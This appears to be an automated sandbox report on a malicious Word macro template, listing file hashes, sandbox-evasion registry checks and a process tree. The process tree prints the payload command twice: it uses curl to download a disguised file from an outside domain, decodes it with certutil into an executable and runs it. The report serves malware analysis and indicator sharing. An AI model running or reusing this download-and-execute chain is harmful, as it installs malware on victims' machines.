Analysis
-
max time kernel
111s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
10/04/2024, 10:22
Behavioral task
behavioral1
Sample
383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm
Resource
win10v2004-20240226-en
General
-
Target
383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm
-
Size
16KB
-
MD5
0fb9bb549173482cfe4faa67ac22a960
-
SHA1
aad49c13d5b80c4b9022889cc9d56bbc04d0f496
-
SHA256
383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f
-
SHA512
ff07db920400bb41a62e7da0f4d54a46fd3b2f56a70789b8f9d8868f93784b6468dd656cea7367e14add124db346896d44619fb041d957658bdc298dd06b43e4
-
SSDEEP
384:tmtNHjUtc6WGaLmrHzVHRQTtxcdV0pjMNJSOTesmB3Dl:qZpG6mrZKpOMp9OTehP
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4596 3448 cmd.exe 90 Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2780 3448 cmd.exe 90 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3448 WINWORD.EXE 3448 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3448 WINWORD.EXE 3448 WINWORD.EXE 3448 WINWORD.EXE 3448 WINWORD.EXE 3448 WINWORD.EXE 3448 WINWORD.EXE 3448 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3448 wrote to memory of 4596 3448 WINWORD.EXE 98 PID 3448 wrote to memory of 4596 3448 WINWORD.EXE 98 PID 4596 wrote to memory of 1616 4596 cmd.exe 102 PID 4596 wrote to memory of 1616 4596 cmd.exe 102 PID 4596 wrote to memory of 4484 4596 cmd.exe 103 PID 4596 wrote to memory of 4484 4596 cmd.exe 103 PID 3448 wrote to memory of 2780 3448 WINWORD.EXE 108 PID 3448 wrote to memory of 2780 3448 WINWORD.EXE 108 PID 2780 wrote to memory of 744 2780 cmd.exe 110 PID 2780 wrote to memory of 744 2780 cmd.exe 110 PID 2780 wrote to memory of 876 2780 cmd.exe 111 PID 2780 wrote to memory of 876 2780 cmd.exe 111
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\AppData\Local & curl http://www.xmlschemeformat.com/update/2021/Office/OxB36F8GEEC634.jpg -o OxB36F8GEEC634.jpg & certutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe & Msdllupdate.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\system32\curl.execurl http://www.xmlschemeformat.com/update/2021/Office/OxB36F8GEEC634.jpg -o OxB36F8GEEC634.jpg3⤵PID:1616
-
-
C:\Windows\system32\certutil.execertutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe3⤵PID:4484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\AppData\Local & curl http://www.xmlschemeformat.com/update/2021/Office/OxB36F8GEEC634.jpg -o OxB36F8GEEC634.jpg & certutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe & Msdllupdate.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\curl.execurl http://www.xmlschemeformat.com/update/2021/Office/OxB36F8GEEC634.jpg -o OxB36F8GEEC634.jpg3⤵PID:744
-
-
C:\Windows\system32\certutil.execertutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe3⤵PID:876
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3348 --field-trial-handle=2256,i,18272763564106695635,11201593968620719822,262144 --variations-seed-version /prefetch:81⤵PID:3744